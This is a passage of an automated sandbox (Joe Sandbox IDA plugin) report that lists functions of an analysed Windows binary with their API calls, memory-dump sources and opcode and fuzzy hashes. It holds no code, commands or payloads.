                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: 382aad3c7c15725abe5d29dd3fe172296de729444acb4bcfab029cbb8fc7aeeb
                                                        • Instruction ID: 54a3c58f76aab7d8001443122cded960216ea3dd91de75d1513b61fe2d110ef6
                                                        • Opcode Fuzzy Hash: 382aad3c7c15725abe5d29dd3fe172296de729444acb4bcfab029cbb8fc7aeeb
                                                        • Instruction Fuzzy Hash: 6B41B135204611AFE310CF16E848F59BBE1EF45358F25D099E419AB7A2C736EC45CBA0
                                                        Function 00E5E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E516C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E5170D
                                                          • Part of subcall function 00E516C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E5173A
                                                          • Part of subcall function 00E516C3: GetLastError.KERNEL32 ref: 00E5174A
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00E5E932
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $ $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-3163812486
                                                        • Opcode ID: 1a064e92463e11af3ed34eadd3d5f7f879b86c8b2929da6a93c69fe9703d14fe
                                                        • Instruction ID: 65d65d50a58c7351af8465ae78b6c9341d9b07c3913ec9ccf031f026eae06652
                                                        • Opcode Fuzzy Hash: 1a064e92463e11af3ed34eadd3d5f7f879b86c8b2929da6a93c69fe9703d14fe
                                                        • Instruction Fuzzy Hash: 30014972A10310AFEB1826B5AC86FFF729C9B44746F242C62FC03F22D1D5B05D4C82A0
                                                        Function 00E71204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E71276
                                                        • WSAGetLastError.WSOCK32 ref: 00E71283
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00E712BA
                                                        • WSAGetLastError.WSOCK32 ref: 00E712C5
                                                        • closesocket.WSOCK32(00000000), ref: 00E712F4
                                                        • listen.WSOCK32(00000000,00000005), ref: 00E71303
                                                        • WSAGetLastError.WSOCK32 ref: 00E7130D
                                                        • closesocket.WSOCK32(00000000), ref: 00E7133C
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                                        • String ID:
                                                        • API String ID: 540024437-0
                                                        • Opcode ID: 0acfee62367e4653808002998970ee5ac997ab8c50282b516ccef5fdd496de1c
                                                        • Instruction ID: 2a0fdd36706f3080a1c2ce288b3563ab523d176ca87eab9cb76c9c9ed4c41acc
                                                        • Opcode Fuzzy Hash: 0acfee62367e4653808002998970ee5ac997ab8c50282b516ccef5fdd496de1c
                                                        • Instruction Fuzzy Hash: 7E418231600240AFD714DF28C484B69BBE5AF46318F29D1C9D95AAF2A3C771ED85CBB1
                                                        Function 00E2B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00E2B9D4
                                                        • _free.LIBCMT ref: 00E2B9F8
                                                        • _free.LIBCMT ref: 00E2BB7F
                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00E93700), ref: 00E2BB91
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00EC121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00E2BC09
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00EC1270,000000FF,?,0000003F,00000000,?), ref: 00E2BC36
                                                        • _free.LIBCMT ref: 00E2BD4B
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                        • String ID:
                                                        • API String ID: 314583886-0
                                                        • Opcode ID: f0e7bbc97e727469d1c8aa6900dafcf62c65dfd074ccceac596ff4659bd68fd1
                                                        • Instruction ID: 0dc20aa86d3a584967250a06adedb3e03f920903ce0eb4b91c2e9215de9ea057
                                                        • Opcode Fuzzy Hash: f0e7bbc97e727469d1c8aa6900dafcf62c65dfd074ccceac596ff4659bd68fd1
                                                        • Instruction Fuzzy Hash: CBC14A71904224AFCB24DF69AC41BAEBBF8EF46314F1861AEE595F7252DB308E41C750
                                                        Function 00E5D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DF3A97,?,?,00DF2E7F,?,?,?,00000000), ref: 00DF3AC2
                                                          • Part of subcall function 00E5E199: GetFileAttributesW.KERNEL32(?,00E5CF95), ref: 00E5E19A
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E5D420
                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E5D470
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E5D481
                                                        • FindClose.KERNEL32(00000000), ref: 00E5D498
                                                        • FindClose.KERNEL32(00000000), ref: 00E5D4A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                        • String ID: \*.*
                                                        • API String ID: 2649000838-1173974218
                                                        • Opcode ID: fa2484b30aeb8122474069de409b83fed14cc15af4847dd4c14da756796bd828
                                                        • Instruction ID: 8325792930b8653e8f0409d93826d0024b8258fd4e6441a255f209eebc0bd3ea
                                                        • Opcode Fuzzy Hash: fa2484b30aeb8122474069de409b83fed14cc15af4847dd4c14da756796bd828
                                                        • Instruction Fuzzy Hash: 55318F7100C3499FC214EF64D8518BFB7E8EE92305F459E1DF9E5A2191EB30AA0D8B72
                                                        Function 00E6648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00E664DC
                                                        • CoInitialize.OLE32(00000000), ref: 00E66639
                                                        • CoCreateInstance.OLE32(00E8FCF8,00000000,00000001,00E8FB68,?), ref: 00E66650
                                                        • CoUninitialize.OLE32 ref: 00E668D4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                        • String ID: .lnk
                                                        • API String ID: 886957087-24824748
                                                        • Opcode ID: 9c3eba7ee2e43e87f0a513d25729fce4030684e9a3a7aad9510a1052d498cd29
                                                        • Instruction ID: bf251feba1dfcf890d17fb47678c6d7480fb4ffc21ed002f60ddda0d7907fa40
                                                        • Opcode Fuzzy Hash: 9c3eba7ee2e43e87f0a513d25729fce4030684e9a3a7aad9510a1052d498cd29
                                                        • Instruction Fuzzy Hash: F8D15B715183059FC304EF24C891A6BB7E8FF94344F10896DF59A9B2A1EB70ED05CBA2
                                                        Function 00E722DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 00E722E8
                                                          • Part of subcall function 00E6E4EC: GetWindowRect.USER32(?,?), ref: 00E6E504
                                                        • GetDesktopWindow.USER32 ref: 00E72312
                                                        • GetWindowRect.USER32(00000000), ref: 00E72319
                                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00E72355
                                                        • GetCursorPos.USER32(?), ref: 00E72381
                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E723DF
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                        • String ID:
                                                        • API String ID: 2387181109-0
                                                        • Opcode ID: 684a3f852b1b15f7da0c6197d0b88d51313d019235f42be198505d39b9a42c54
                                                        • Instruction ID: 7f56111242dd8b701e1d46c1a583e19b1dc86bad3d2ae51de614553a437b6876
                                                        • Opcode Fuzzy Hash: 684a3f852b1b15f7da0c6197d0b88d51313d019235f42be198505d39b9a42c54
                                                        • Instruction Fuzzy Hash: 8F31F072104306AFCB20DF15D844B5BBBEAFF85314F10591DF988A7281DB34EA08CBA2
                                                        Function 00E69B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00E69B78
                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00E69C8B
                                                          • Part of subcall function 00E63874: GetInputState.USER32 ref: 00E638CB
                                                          • Part of subcall function 00E63874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E63966
                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00E69BA8
                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00E69C75
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                        • String ID: *.*
                                                        • API String ID: 1972594611-438819550
                                                        • Opcode ID: 7e325b6c692ff4d3cab523d33efc87b4622ac17de9018f4db3df474d5a2f873e
                                                        • Instruction ID: aa5bce7c1ab620f322f46ed80c4840942376ac4b38e788b1a53910850f6a4adc
                                                        • Opcode Fuzzy Hash: 7e325b6c692ff4d3cab523d33efc87b4622ac17de9018f4db3df474d5a2f873e
                                                        • Instruction Fuzzy Hash: D841827194020A9FCF14DF64D985AEEBBF8EF05354F249055F509B2192EB309E84CF60
                                                        Function 00E5DBBE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29filestringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,"R), ref: 00E5DBCE
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00E5DBDD
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E5DBEE
                                                        • FindClose.KERNEL32(00000000), ref: 00E5DBFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                                        • String ID: "R
                                                        • API String ID: 2695905019-1746183819
                                                        • Opcode ID: 9a8146b63a3c90c47c0dedac97d360651f500e8845959c5b36b575a4153e9f2a
                                                        • Instruction ID: 77976206ac8d588523e7e17dda32a2ed4d0db620ca50fc91f6050e54b3340afa
                                                        • Opcode Fuzzy Hash: 9a8146b63a3c90c47c0dedac97d360651f500e8845959c5b36b575a4153e9f2a
                                                        • Instruction Fuzzy Hash: DFF0A7304149145B82306B79AC0D4AE776C9F02335B204B02F839E20F0EBB0595C86A5
                                                        Function 00E0997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E09BB2
                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E09A4E
                                                        • GetSysColor.USER32(0000000F), ref: 00E09B23
                                                        • SetBkColor.GDI32(?,00000000), ref: 00E09B36
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Color$LongProcWindow
                                                        • String ID:
                                                        • API String ID: 3131106179-0
                                                        • Opcode ID: 179f7d8e576a5d98ceb6ffd2ad5588cd3a5d3147b83a1c9bd82ec18f84b0b009
                                                        • Instruction ID: e66463bc0224468977dcc3a50929c10d8372a902fac8619badadf3fd9034f580
                                                        • Opcode Fuzzy Hash: 179f7d8e576a5d98ceb6ffd2ad5588cd3a5d3147b83a1c9bd82ec18f84b0b009
                                                        • Instruction Fuzzy Hash: 00A11B70209404AEE728AE2D9C4CEBB36ADDB86358F15211AF486F65D3CB259D81C3B5
                                                        Function 00E71806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E7304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00E7307A
                                                          • Part of subcall function 00E7304E: _wcslen.LIBCMT ref: 00E7309B
                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E7185D
                                                        • WSAGetLastError.WSOCK32 ref: 00E71884
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00E718DB
                                                        • WSAGetLastError.WSOCK32 ref: 00E718E6
                                                        • closesocket.WSOCK32(00000000), ref: 00E71915
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 1601658205-0
                                                        • Opcode ID: 165e616f66ed20fdf1901cfd0206107a34b98e212b23042b537bcd544b8fb290
                                                        • Instruction ID: 9228eb999062bb385b81115c3bd27611b6a7610dd91a5966cc8f0496fc3da997
                                                        • Opcode Fuzzy Hash: 165e616f66ed20fdf1901cfd0206107a34b98e212b23042b537bcd544b8fb290
                                                        • Instruction Fuzzy Hash: 36518071A00204AFE714AF24C886B7A77E5EB45718F19C098EA196F3D3C671AD418BB1
                                                        Function 00E81C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                        • String ID:
                                                        • API String ID: 292994002-0
                                                        • Opcode ID: 61fd0193427b810a5e306cb67365fa2620d0f7d0297ffb65bd229b0f872ab3e7
                                                        • Instruction ID: 751dc04387a1549582f4df8f4a0d2508108a3e98ba5584eaf846b77ecb12f7a3
                                                        • Opcode Fuzzy Hash: 61fd0193427b810a5e306cb67365fa2620d0f7d0297ffb65bd229b0f872ab3e7
                                                        • Instruction Fuzzy Hash: 2A21D6317402015FD724AF1AC844B66BBE9EF85315B19A0ACE84DEB351C771DC43CBA0
                                                        Function 00E14CE8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00E228E9,(,00E14CBE,00000000,00EB88B8,0000000C,00E14E15,(,00000002,00000000,?,00E228E9,00000003,00E22DF7,?,?), ref: 00E14D09
                                                        • TerminateProcess.KERNEL32(00000000,?,00E228E9,00000003,00E22DF7,?,?,?,00E1E6D1,?,00EB8A48,00000010,00DF4F4A,?,?,00000000), ref: 00E14D10
                                                        • ExitProcess.KERNEL32 ref: 00E14D22
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentExitTerminate
                                                        • String ID: (
                                                        • API String ID: 1703294689-2063206799
                                                        • Opcode ID: b5bee4d37da3814352b891ccbbd74eee03478bdb9838c5ecb4c7e3d48df043e5
                                                        • Instruction ID: 432ebb6fce8daee0bd9303dcee4a5bb48ea5f49fb2c101c22b7fd5da6f678899
                                                        • Opcode Fuzzy Hash: b5bee4d37da3814352b891ccbbd74eee03478bdb9838c5ecb4c7e3d48df043e5
                                                        • Instruction Fuzzy Hash: 0DE0B6B1000548AFCF11AF65ED09A983B69FB42B85B205054FC19AA262CB35DD86DB90
                                                        Function 00E7A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00E7A6AC
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00E7A6BA
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00E7A79C
                                                        • CloseHandle.KERNEL32(00000000), ref: 00E7A7AB
                                                          • Part of subcall function 00E0CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00E33303,?), ref: 00E0CE8A
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                        • String ID:
                                                        • API String ID: 1991900642-0
                                                        • Opcode ID: de14022915163e198c07c953499d1fd02ee91a817e90e1ac42b8f9adf2dc0e7b
                                                        • Instruction ID: d4fca063dbf4bd253ac67b47db16014b4ad987f2f207f9a19a179b713fe29d28
                                                        • Opcode Fuzzy Hash: de14022915163e198c07c953499d1fd02ee91a817e90e1ac42b8f9adf2dc0e7b
                                                        • Instruction Fuzzy Hash: 57516E715083049FD714DF25C886A6FBBE8FF89754F05892DF589A7291EB30D904CBA2
                                                        Function 00E5AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00E5AAAC
                                                        • SetKeyboardState.USER32(00000080), ref: 00E5AAC8
                                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00E5AB36
                                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00E5AB88
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: da5f8d78306a8650e7e32ecb410a9bc782a23f57e45f1effa9a0df75a6ccccca
                                                        • Instruction ID: 598c20de5198b6f5c92e1453ca210d05c7ad34f815021ada165c42aac2005f57
                                                        • Opcode Fuzzy Hash: da5f8d78306a8650e7e32ecb410a9bc782a23f57e45f1effa9a0df75a6ccccca
                                                        • Instruction Fuzzy Hash: 44312A30A40208AEFF308B65CC05BFA77A6AB45316F1C5B2AF985721D1D375898DC7E2
                                                        Function 00E65C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                        Download Yara Rule
                                                        APIs
